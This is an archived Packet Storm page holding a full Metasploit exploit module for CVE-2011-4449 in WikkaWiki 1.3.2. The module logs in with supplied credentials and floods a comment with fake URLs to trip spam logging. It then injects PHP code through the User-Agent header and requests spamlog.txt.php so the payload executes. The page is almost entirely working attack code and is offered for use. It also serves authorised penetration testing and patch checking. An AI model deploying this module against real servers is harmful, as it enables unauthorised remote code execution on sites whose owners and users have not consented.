what you don't know can hurt you

WikkaWiki 1.3.2 Spam Logging PHP Injection

WikkaWiki 1.3.2 Spam Logging PHP Injection
Posted May 11, 2012
Authored by EgiX, sinn3r | Site metasploit.com

This Metasploit module exploits a vulnerability found in WikkaWiki. When the spam logging feature is enabled, it is possible to inject PHP code into the spam log file via the UserAgent header, and then request it to execute our payload. There are at least three different ways to trigger spam protection, this module does so by generating 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6). Please note that in order to use the injection, you must manually pick a page first that allows you to add a comment, and then set it as 'PAGE'.

tags | exploit, php
advisories | CVE-2011-4449, OSVDB-77391
MD5 | aff0f7b9f5cfd47509018a345f9d31f5

WikkaWiki 1.3.2 Spam Logging PHP Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
'Description' => %q{
This module exploits a vulnerability found in WikkaWiki. When the spam logging
feature is enabled, it is possible to inject PHP code into the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generating
10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).

Please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'PAGE'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Initial discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http://wush.net/trac/wikka/ticket/1098']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Arch' => ARCH_PHP,
'Platform' => ['php'],
'Targets' =>
[
['WikkaWiki 1.3.2 r1814', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2011",
'DefaultTarget' => 0))

register_options(
[
OptString.new('USERNAME', [true, 'WikkaWiki username']),
OptString.new('PASSWORD', [true, 'WikkaWiki password']),
OptString.new('PAGE', [true, 'Page to inject']),
OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)
end


def check
res = send_request_raw({
'method' => 'GET',
'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"
})

if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end


#
# Get the cookie before we do any of that login/exploity stuff
#
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
})

# Get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise RuntimeError, "#{@peer} - No cookie found, will not continue"
end

cookie
end


#
# Do login, and then return the cookie that contains our credential
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
})

# Extract the hidden fields
login = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Login\/Register\<\/legend\>/m
fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
login[name] = value
end
else
raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
end

# Add the rest of fields required for login
login['action'] = 'login'
login['name'] = datastore['USERNAME']
login['password'] = datastore['PASSWORD']
login['do_redirect'] = 'on'
login['submit'] = "Login"
login['confpassword'] = ''
login['email'] = ''

port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => login
})

if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""
end

return cookie_cred
end


#
# After login, we inject the PHP payload
#
def inject_exec(cookie)
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie
})

fields = {}
if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
end

# Generate enough URLs to trigger spam logging
urls = ''
10.times do |i|
urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"
end

# Add more fields
fields['body'] = urls
fields['submit'] = 'Add'

# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"
})

send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
})
end


def exploit
@peer = "#{rhost}:#{rport}"

@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'

print_status("#{@peer} - Getting cookie")
cookie = get_cookie

print_status("#{@peer} - Logging in")
cred = login(cookie)

print_status("#{@peer} - Triggering spam logging")
inject_exec(cred)

handler
end
end


=begin
For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka

Open wikka.config.php, do:
'spam_logging' => '1'
=end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    20 Files
  • 21
    Sep 21st
    3 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close